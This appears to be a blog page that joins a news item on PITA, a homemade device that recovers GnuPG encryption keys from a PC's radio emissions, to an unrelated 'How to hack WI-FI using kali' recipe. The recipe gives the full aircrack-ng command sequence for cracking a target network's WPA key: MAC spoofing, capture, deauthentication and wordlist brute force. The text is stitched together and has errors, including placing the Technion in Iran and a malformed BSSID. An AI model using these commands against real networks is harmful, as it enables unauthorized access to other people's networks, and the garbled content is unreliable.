A Homemade Device That Can Steal Keys and Hack Data From Your PC: PITA

When someone talks about stealing some data from a PC, what is the suspected source according to you? You may end up guessing Ethernet, WiFi, or Bluetooth.But once in a while, the truth could be something totally different.

The researchers at Tel Aviv University and the Technion of Iran has made a device that could be easily made at home and it captured the stray radio waves emitted by your computer’s processor.

This round device has been dubbed PITA by its creators and it works within the two feet distance. This costs less than $300 using the easily available components and the PITA is small enough to fit inside a piece of pita bread. Actually, PITA is an abbreviation of Portable Instrument for Trace Acquisition.
The information fetched from the open air could be stored locally on an SD card that is housed on the device, or it could be transmitted to the spy with the help of WiFi. So, you can capture the electromagnetic waves and use them to decrypt the EIGamal and RSA data from up to 19 inches away.

The PITA is built using simple components like a WiFi antenna, SDR receiver, capacitors to tune the antenna, a loop antenna and is run using 4-AA batteries.
During the research, the researchers focused their attention on GnuPG (or GPG) – a software implementation by the GNU Project and is widely used. It secures sensitive stuff like BitCoin wallets, emails and conversations. Well, the people at GNU have already issued an update against this particular attack.
However, this technique could also be used against RSA and other forms of encryption and the PITA team is working to expand the range of the device.
Did you like this story about the processor hacking gadget PITA? Do tell us in comments below.

How to hack WI-FI using kali

How to do it...

Let's begin the process of using AirCrack to crack a network session secured by WPA.

1.       Open a terminal window and bring up a list of wireless network interfaces.

airmon-ng

2.       Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.

3.       Next, we need to stop the wlan0 interface and take it down.

airmon-ng stop wlan0 ifconfig wlan0 down

4.       Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55.

macchanger -–mac 00:11:22:33:44:55 wlan0

5.       Now  we need to restart airmon-ng. airmon-ng start wlan0

6.       Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0

7.       A listing of available networks will begin to appear. Once you fi nd the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will fi nd this information in the Channel column. In this case, the channel is 10.

8.       Now we run airodump and copy the information for the selected BSSID to a fi le.

We will utilize the following options:

q  –c allows us to select our channel. In this case, we use 10.

q  –w allows us to select the name of our file. In this case, we have chosen wirelessattack.

q  –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard.

airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0

9.       A new terminal window will open displaying the output from the previous command. Leave this window open.

10.   Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng –dauth 1 –a [BSSID] –c [our chosen MAC address] [Interface]. This process may take a few moments.

Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 00:11:22:33:44:55 wlan0

11.   Finally, we run AirCrack to crack the WPA key. The –w option allows us to specify the location of our wordlist. We will use the .cap fi le that we named earlier. In this case, the fi le's name is wirelessattack.cap.

Aircrack-ng –w ./wordlist.lst wirelessattack.cap

That's it!

How it works...

In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. 

AirCrack works by gathering packets from a wireless connection over WPA and then brute-forcing passwords  against the gathered data until a successful handshake is established. 

We began the recipe by starting AirCrack and selecting our desired interface. 

Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. 

We concluded by gathering some traffi c and then brute forced the generated CAP file in order to get the wireless password.